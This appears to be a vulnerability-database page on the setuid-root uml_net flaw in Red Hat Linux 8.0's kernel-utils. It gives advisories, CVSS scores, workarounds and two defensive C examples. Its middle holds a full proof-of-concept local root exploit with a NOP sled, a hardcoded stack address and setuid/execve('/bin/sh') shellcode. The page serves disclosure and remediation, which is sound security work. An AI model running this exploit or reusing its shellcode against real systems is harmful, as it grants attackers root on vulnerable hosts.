Published: 2003-02-19 00:00:00
Revised: 2008-09-10 20:05:23

[Original] uml_net in the kernel-utils package for Red Hat Linux 8.0 has incorrect setuid root privileges, which allows local users to modify network interfaces, e.g. by modifying ARP entries or placing interfaces into promiscuous mode.

[CNNVD] Red Hat Linux User Mode Linux SetUID Installation Vulnerability (CNNVD-200302-045)

        Red Hat is a free, open-source Linux distribution. Its kernel-utils package contains several tools for controlling the kernel or the machine's hardware, and Red Hat 8.0 ships the User Mode Linux (UML) utilities in it.
        The uml_net tool in the kernel-utils package installed by default on Red Hat 8.0 is incorrectly installed setuid root. Any local user can therefore use it to control some of the host's network interfaces: add and delete ARP entries and routes, and place interfaces in promiscuous mode.
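The misconfiguration above is a permission bit, so the check and the fix are both file-mode operations. The following is an added example written for this page, not code from the advisory or from kernel-utils: it reports whether a binary is setuid (and setuid root), applies the `chmod -s` workaround while preserving the other mode bits, and demonstrates both on a constructed stand-in file created in the temp directory with the vulnerable mode 4755, so it never touches the real /usr/bin/uml_net. The stub name and the `TMPDIR` fallback are assumptions for the demonstration; point `is_setuid_root` at a real path to audit a host, or inventory every candidate first with `find / -xdev -type f -perm -4000 -user root`.

```c
/* Added example, not part of the advisory or of kernel-utils: detect and
 * fix an unintended setuid-root installation such as the uml_net case.
 * Demonstrated on a constructed stand-in file so it never modifies
 * /usr/bin/uml_net. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if path is a regular file with the setuid bit set, else 0
 * (missing or unreadable files count as "not setuid"). */
int is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    return (S_ISREG(st.st_mode) && (st.st_mode & S_ISUID)) ? 1 : 0;
}

/* The dangerous combination: setuid AND owned by uid 0, which hands every
 * local user a root-privileged code path into the binary. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    return (S_ISREG(st.st_mode) && (st.st_mode & S_ISUID) && st.st_uid == 0) ? 1 : 0;
}

/* The RHSA-2003:056 workaround, `chmod -s`: clear setuid and setgid but
 * keep every other permission bit.  Returns 0 on success, -1 on failure. */
int strip_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return chmod(path, (st.st_mode & 07777) & ~(S_ISUID | S_ISGID)) == 0 ? 0 : -1;
}

/* Create a stand-in "uml_net" with mode 4755 (rwsr-xr-x), the mode the
 * vulnerable kernel-utils package installed the real binary with.
 * Constructed for the demonstration only.  Writes the path into buf and
 * returns 0, or -1 on failure. */
int make_vulnerable_stub(char *buf, size_t buflen)
{
    const char *dir = getenv("TMPDIR");   /* assumption: fall back to /tmp */
    int fd;
    if (dir == NULL)
        dir = "/tmp";
    snprintf(buf, buflen, "%s/uml_net_stub.%ld", dir, (long)getpid());
    fd = open(buf, O_WRONLY | O_CREAT | O_EXCL, 0755);
    if (fd < 0)
        return -1;
    close(fd);
    if (chmod(buf, S_ISUID | 0755) != 0)  /* 04755: the misconfiguration */
        return -1;
    return 0;
}

int main(void)
{
    char path[256];
    if (make_vulnerable_stub(path, sizeof path) != 0) {
        perror("make_vulnerable_stub");
        return 1;
    }
    printf("%s: setuid=%d setuid_root=%d\n", path, is_setuid(path), is_setuid_root(path));
    if (strip_setuid(path) != 0)
        perror("strip_setuid");
    printf("%s after chmod -s: setuid=%d\n", path, is_setuid(path));
    unlink(path);
    return 0;
}
```

`is_setuid_root` only reports 1 for the stub when the example itself runs as root (the stub is owned by whoever created it); on a real host that is exactly the case to look for, since a setuid bit on a file owned by an unprivileged user grants nothing beyond that user.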

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [the system can be taken down completely]
Attack complexity: LOW [no special access conditions are needed to exploit]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(official source) MITRE
(official source) NVD
(official source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  XF  linux-umlnet-gain-privileges(11276)
(UNKNOWN)  BID  6801

- Vulnerability information

Red Hat Linux User Mode Linux SetUID Installation Vulnerability
High Configuration error
2003-02-19 00:00:00 2005-05-13 00:00:00

- Advisories and patches

        * Workaround: chmod -s /usr/bin/uml_net
        RHSA-2003:056-08: Updated kernel-utils packages fix setuid vulnerability
        Red Hat Linux 8.0:
        rpm -Fvh [filename]

- Vulnerability information (22640)

UML_NET Integer Mismanagement Code Execution Vulnerability (EDBID:22640)
linux local
2003-05-23 Verified
N/A

A vulnerability has been discovered in uml_net. Due to integer mismanagement while handling version information, it may be possible for an attacker to execute arbitrary code. Specifically, by supplying a negative value within the version information it is possible to bypass various calculations and cause an invalid indexing into an array of functions. As a result, it is possible for an attacker to execute a function in an attacker-controlled location of memory.

Successful exploitation of this vulnerability would allow an attacker to execute arbitrary commands with the privileges of uml_net, possibly root. 
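The flaw described above is a classic signed-index bug: a "version" value taken from the command line is checked only against its upper bound, so a negative number passes the check and the table lookup reads a function pointer from memory before the table. The block below is an added example written for this page, not uml_net's source: the handler table, the handler names and the two checks are a constructed illustration of that bug class, the vulnerable shape beside the fixed one. The only value taken from the page is -302068188, the ROT constant the proof-of-concept below passes as uml_net's version argument. The vulnerable check never dereferences out of bounds here; it only reports whether a value would get through.

```c
/* Added example, not uml_net's code: a signed version number used as an
 * index into a table of handler functions, with only the upper bound
 * checked (vulnerable) and with a single unsigned bound check (fixed). */
#include <errno.h>
#include <limits.h>
#include <stdlib.h>

typedef int (*handler_fn)(void);

/* Hypothetical per-version handlers standing in for uml_net's table. */
static int handle_v0(void) { return 100; }
static int handle_v1(void) { return 101; }
static int handle_v2(void) { return 102; }

static const handler_fn handlers[] = { handle_v0, handle_v1, handle_v2 };
#define NHANDLERS ((int)(sizeof handlers / sizeof handlers[0]))

/* Vulnerable shape: only "too large" is rejected.  Every negative value is
 * accepted, and handlers[version] would then read a pointer from before
 * the table and call whatever it finds (attacker-controlled memory in the
 * uml_net case).  Returns 1 if the value would pass, 0 if rejected. */
int check_vulnerable(int version)
{
    if (version > NHANDLERS - 1)
        return 0;
    return 1;
}

/* Fixed shape: compare as unsigned so a negative int becomes a huge value
 * and fails the same single bound test.  Returns 1 if in range, else 0. */
int check_fixed(int version)
{
    if ((unsigned int)version >= (unsigned int)NHANDLERS)
        return 0;
    return 1;
}

/* Dispatch through the fixed check; returns the handler's result or -1. */
int dispatch(int version)
{
    if (!check_fixed(version))
        return -1;
    return handlers[version]();
}

/* Parse the argument the way a setuid tool should: strtol with full error
 * checking instead of atoi, rejecting trailing junk, overflow and negative
 * values up front.  Returns 0 and stores the value, or -1 on rejection. */
int parse_version(const char *s, int *out)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (errno != 0 || end == s || *end != '\0' || v < 0 || v > INT_MAX)
        return -1;
    *out = (int)v;
    return 0;
}
```

With the exploit's value, `check_vulnerable(-302068188)` returns 1 and `check_fixed(-302068188)` returns 0; the unsigned comparison costs nothing over the original test and closes the whole negative range at once, and `parse_version` rejects the string "-302068188" before it ever reaches the table.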

  uml_net proof of concept exploit 
  Tested on: RH 8.0 with default uml_utilities from kernel-utils-2.4-8.13 
             RH 8.0 with binary from uml_utilities_20030312, uml_utilities_20020821
  It may work on other linux distributions 
  Based on the bug that I found in uml_net.c on 23.05.2003
  Greets: M|G - no1 keep up the good work
  	  securitech guys, security-corp guys - thx for the challenges
  	  all of you who support me in real life 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SHELL 0xbffffdd7	/* stack address expected to fall inside the NOP sled */
#define ROT -302068188		/* negative "version" value that mis-indexes the function table */

/* Build the single environment string that carries the payload: a 5000-byte
   NOP sled in which the SHELL address is repeated every 4 bytes (shifted by
   pad so it lines up with the word uml_net reads), followed by the
   setuid(0) + execve("/bin/sh") shellcode.  */
char *
gen (int pad)
{
  int i, size;
  char *p;
  char shellcode[] = "\x31\xc0"	// xorl    %eax,%eax
    "\x31\xdb"			// xorl    %ebx,%ebx
    "\xb0\x17"			// movb    $0x17,%al
    "\xcd\x80"			// int     $0x80
    "\xeb\x18"			// jmp     end
    				// start:
    "\x5e"			// popl    %esi
    "\x89\x76\x08"		// movl    %esi,0x8(%esi)
    "\x31\xc0"			// xorl    %eax,%eax
    "\x88\x46\x07"		// movb    %eax,0x7(%esi)
    "\x89\x46\x0c"		// movl    %eax,0xc(%esi)
    "\xb0\x0b"			// movb    $0xb,%al
    "\x89\xf3"			// movl    %esi,%ebx
    "\x8d\x4e\x08"		// leal    0x8(%esi),%ecx
    "\x8d\x56\x0c"		// leal    0xc(%esi),%edx
    "\xcd\x80"			// int     $0x80
    				// end:
    "\xe8\xe3\xff\xff\xff"	// call    start
    "\x2f\x62\x69\x6e\x2f\x73\x68";	// .string "/bin/sh"

  size = sizeof (shellcode);	/* includes the terminating NUL */
  p = (char *) malloc (5000 + size + 1);
  memset (p, 0x90, 5000);
  for (i = 1; i < 1000; i++)
    *(int *) (p + 4 * i + pad) = SHELL;
  memcpy (p + 5000, shellcode, size);
  memcpy (p, "SM00NY=", 7);	/* NAME= prefix for the env entry; only the head of the sled is overwritten */
  return p;
}

void
usage (char *sir)
{
  printf ("\nUsage: %s <UML_NET> [pad]\n\n", sir);
  printf ("Pad value: 0 - 3\nDefault: 0\n");
  printf ("\n");
}

int
main (int argc, char **argv)
{
  unsigned long pad = 0;
  char s[1000];
  char *nume[4], *pume[2];

  if (argc < 2)
    {
      usage (argv[0]);
      exit (0);
    }

  if (argv[2])
    pad = atoi (argv[2]);

  sprintf (s, "%d", ROT);	/* bogus version number handed to uml_net as argv[1] */

  nume[0] = argv[1];
  nume[1] = s;
  nume[2] = "add";
  nume[3] = NULL;

  pume[0] = gen (pad);		/* the entire environment is the payload string */
  pume[1] = NULL;

  printf ("Trying to exploit.... pad value: %lu\n", pad);
  printf ("If you get a segfault, try to change the pad value !\n");

  execve (nume[0], nume, pume);
  perror ("execve");		/* only reached if uml_net could not be run */
  return 1;
}

- Vulnerability information

Red Hat Linux kernel_utils uml_net Overflow
Local Access Required Input Manipulation, Misconfiguration
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

A local overflow exists in uml_net from kernel-utils. uml_net fails to properly check bounds, resulting in an integer overflow. With a specially crafted request, an attacker can cause an overflow resulting in a loss of confidentiality, integrity, and/or availability. Note that this would not normally be an issue, but this version of kernel-utils installs uml_net as setuid root.

- Timeline

2003-05-23 Unknown
2003-09-28 Unknown

- Solution

Upgrade to kernel-utils version 2.4-8.28 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): chmod -s /usr/bin/uml_net

- References

- Credit

- Vulnerability information

Red Hat Linux User Mode Linux SetUID Installation Vulnerability
Configuration Error 6801
Remote: No Local: Yes
2003-02-07 12:00:00 2009-07-11 08:06:00
Discovery credited to Johnny Robertson.

- Affected versions

RedHat Linux 8.0 i386

- Discussion

It has been reported that under some circumstances, Red Hat Linux may allow unauthorized actions through User-Mode-Linux compatibility. Due to permissions on some components installed with the User-Mode-Linux utilities, a local user could perform actions on the system that require privilege, potentially affecting local host security.

- Exploit

No exploit is required for this vulnerability.

- Solution

Fixes that correct this issue have been released:

RedHat Linux 8.0 i386

- References